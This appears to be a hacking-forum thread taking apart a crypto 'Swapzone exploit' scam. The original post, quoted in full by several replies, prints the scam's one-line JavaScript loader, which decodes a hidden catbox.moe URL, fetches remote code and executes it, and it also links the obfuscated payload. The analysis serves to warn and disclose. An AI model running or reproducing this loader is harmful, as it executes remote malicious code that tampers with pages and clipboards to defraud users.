Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   7592

Breaking Down the 'Swapzone Exploit' SCAM

by Jumpy22 - 09 August, 2025 - 04:52 AM
This post is by a banned member (Jumpy22) - Unhide
Jumpy22  
Godlike
1.308
Posts
283
Threads
7 Years of service
#1
Minutes ago I received this dm:
[Image: brave-hsm-GOFYIss.png]

I thought hm thats interesting let me check it out. I look at it and it seems odd (archive of the Google doc).

The paste.sh link contains the following:
Code:
(()=>{let node='https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw/btc/node-1.9.js'.match(/changenow\/(.*?)\//)[1];fetch(atob(node)).then(r=>r.text()).then(c=>Function(c)())})();

First thing I noticed was the url. This url does not exist and never has existed. The next thing I saw was the match to a regex. I ran the node string and the regex through an online regex matcher it extracts the 'aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw'. This string is sent through atob() and outputs a catbox-hosted js file (https://files.catbox.moe/3rc7dl.js):
HUGE ASS OBFUSCATED JS WARNING
https://mega.nz/file/dxAHUY6a#dvoqyZxMFH...K-_dHRWJoo

Heres what AI had to say about it (no way in hell Im deobfuscating it manually):
Quote:The file is an obfuscated drop-in script that decodes a large table of hex-encoded strings at runtime and uses them as the real names for DOM selectors, messages and function names.

At runtime it:

Reads many DOM inputs (prices, quantity fields, shipping, currency strings).

Computes and overwrites text nodes / form fields with manipulated price/currency strings (e.g. formatting values and inserting ~$ + value into elements).

Places or updates hidden inputs / DOM nodes with compiled values.

Hooks UI elements (buttons/links) and rewrites/copies some value to navigator.clipboard.writeText(...) (i.e. copies a manipulated price/code to the clipboard) and/or calls navigator APIs.

Uses atob(...) on an embedded base64 chunk to build an initial string and then picks/from a built list of possible strings and may randomly choose one.

Runs on a timer (setInterval) to repeatedly apply the manipulations.

Has conditional logging to console if the location (URL) contains a particular substring.

Intent: client-side tampering / user-visible manipulation — likely used to alter displayed prices / coupon codes / affiliate strings, exfiltrate some small bits (clipboard), or trick users into copying bad values.

This is malicious — it modifies page content and interacts with clipboard and DOM in ways that can be used for fraud, price injection, or other attacks.

Thats awesome now instead of losing your money to retards give it to me instead

Example of a retard losing their money to a simple scam:
[Image: retardgetsscammed.png]
[Image: WEbU7oOt.png]

My Contact Info:
@crashoutadmin (Telegram)
This post is by a banned member (lCloudyyl) - Unhide
lCloudyyl  
Infinity
58
Posts
1
Threads
3 Years of service
#2
Oh no! not my money!!!!
I like bananas.

[Image: PepeBlush.png]
discord.gg/parser
This post is by a banned member (HenzoF) - Unhide
HenzoF  
Infinity
6
Posts
3
Threads
1 Year of service
#3
(09 August, 2025 - 04:52 AM)lCloudyyl Wrote: Show More
Oh no! not my money!!!!

how did you fall for this ☠️☠️☠️
This post is by a banned member (Labyrinth) - Unhide
Labyrinth  
Infinity
1.746
Posts
70
Threads
3 Years of service
#4
popcat
Discord: Labyrinthnto
Telegram: Labyrinthnto

[Image: 1UDhq2t.gif]
This post is by a banned member (lCloudyyl) - Unhide
lCloudyyl  
Infinity
58
Posts
1
Threads
3 Years of service
#5
(10 August, 2025 - 03:21 AM)HenzoF Wrote: Show More
(09 August, 2025 - 04:52 AM)lCloudyyl Wrote: Show More
Oh no! not my money!!!!

how did you fall for this ☠️☠️☠️

I didnt actually lmfao we were in call fucking around when he wrote the thread and i got dm'd by the bot
I like bananas.

[Image: PepeBlush.png]
discord.gg/parser
This post is by a banned member (ozzlo) - Unhide
ozzlo  
Infinity
20
Posts
8
Threads
#6
(09 August, 2025 - 04:52 AM)Jumpy22 Wrote: Show More
Minutes ago I received this dm:
[Image: brave-hsm-GOFYIss.png]

I thought hm thats interesting let me check it out. I look at it and it seems odd (archive of the Google doc).

The paste.sh link contains the following:
Code:
(()=>{let node='https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw/btc/node-1.9.js'.match(/changenow\/(.*?)\//)[1];fetch(atob(node)).then(r=>r.text()).then(c=>Function(c)())})();

First thing I noticed was the url. This url does not exist and never has existed. The next thing I saw was the match to a regex. I ran the node string and the regex through an online regex matcher it extracts the 'aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw'. This string is sent through atob() and outputs a catbox-hosted js file (https://files.catbox.moe/3rc7dl.js):
HUGE ASS OBFUSCATED JS WARNING
https://mega.nz/file/dxAHUY6a#dvoqyZxMFH...K-_dHRWJoo

Heres what AI had to say about it (no way in hell Im deobfuscating it manually):
Quote:The file is an obfuscated drop-in script that decodes a large table of hex-encoded strings at runtime and uses them as the real names for DOM selectors, messages and function names.

At runtime it:

Reads many DOM inputs (prices, quantity fields, shipping, currency strings).

Computes and overwrites text nodes / form fields with manipulated price/currency strings (e.g. formatting values and inserting ~$ + value into elements).

Places or updates hidden inputs / DOM nodes with compiled values.

Hooks UI elements (buttons/links) and rewrites/copies some value to navigator.clipboard.writeText(...) (i.e. copies a manipulated price/code to the clipboard) and/or calls navigator APIs.

Uses atob(...) on an embedded base64 chunk to build an initial string and then picks/from a built list of possible strings and may randomly choose one.

Runs on a timer (setInterval) to repeatedly apply the manipulations.

Has conditional logging to console if the location (URL) contains a particular substring.

Intent: client-side tampering / user-visible manipulation — likely used to alter displayed prices / coupon codes / affiliate strings, exfiltrate some small bits (clipboard), or trick users into copying bad values.

This is malicious — it modifies page content and interacts with clipboard and DOM in ways that can be used for fraud, price injection, or other attacks.

Thats awesome now instead of losing your money to retards give it to me instead

Example of a retard losing their money to a simple scam:
[Image: retardgetsscammed.png]
Haha what
[Image: FINAL-FINAL.gif]
This post is by a banned member (psuedojix) - Unhide
This post is by a banned member (fopoc707) - Unhide
fopoc707  
Registered
4
Posts
0
Threads
#8
(09 August, 2025 - 04:52 AM)Jumpy22 Wrote: Show More
Minutes ago I received this dm:
[Image: brave-hsm-GOFYIss.png]

I thought hm thats interesting let me check it out. I look at it and it seems odd (archive of the Google doc).

The paste.sh link contains the following:
Code:
(()=>{let node='https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw/btc/node-1.9.js'.match(/changenow\/(.*?)\//)[1];fetch(atob(node)).then(r=>r.text()).then(c=>Function(c)())})();

First thing I noticed was the url. This url does not exist and never has existed. The next thing I saw was the match to a regex. I ran the node string and the regex through an online regex matcher it extracts the 'aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw'. This string is sent through atob() and outputs a catbox-hosted js file (https://files.catbox.moe/3rc7dl.js):
HUGE ASS OBFUSCATED JS WARNING
https://mega.nz/file/dxAHUY6a#dvoqyZxMFH...K-_dHRWJoo

Heres what AI had to say about it (no way in hell Im deobfuscating it manually):
Quote:The file is an obfuscated drop-in script that decodes a large table of hex-encoded strings at runtime and uses them as the real names for DOM selectors, messages and function names.

At runtime it:

Reads many DOM inputs (prices, quantity fields, shipping, currency strings).

Computes and overwrites text nodes / form fields with manipulated price/currency strings (e.g. formatting values and inserting ~$ + value into elements).

Places or updates hidden inputs / DOM nodes with compiled values.

Hooks UI elements (buttons/links) and rewrites/copies some value to navigator.clipboard.writeText(...) (i.e. copies a manipulated price/code to the clipboard) and/or calls navigator APIs.

Uses atob(...) on an embedded base64 chunk to build an initial string and then picks/from a built list of possible strings and may randomly choose one.

Runs on a timer (setInterval) to repeatedly apply the manipulations.

Has conditional logging to console if the location (URL) contains a particular substring.

Intent: client-side tampering / user-visible manipulation — likely used to alter displayed prices / coupon codes / affiliate strings, exfiltrate some small bits (clipboard), or trick users into copying bad values.

This is malicious — it modifies page content and interacts with clipboard and DOM in ways that can be used for fraud, price injection, or other attacks.

Thats awesome now instead of losing your money to retards give it to me instead

Example of a retard losing their money to a simple scam:
[Image: retardgetsscammed.png]

Goated [Image: hackerman.gif]

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 5 Guest(s)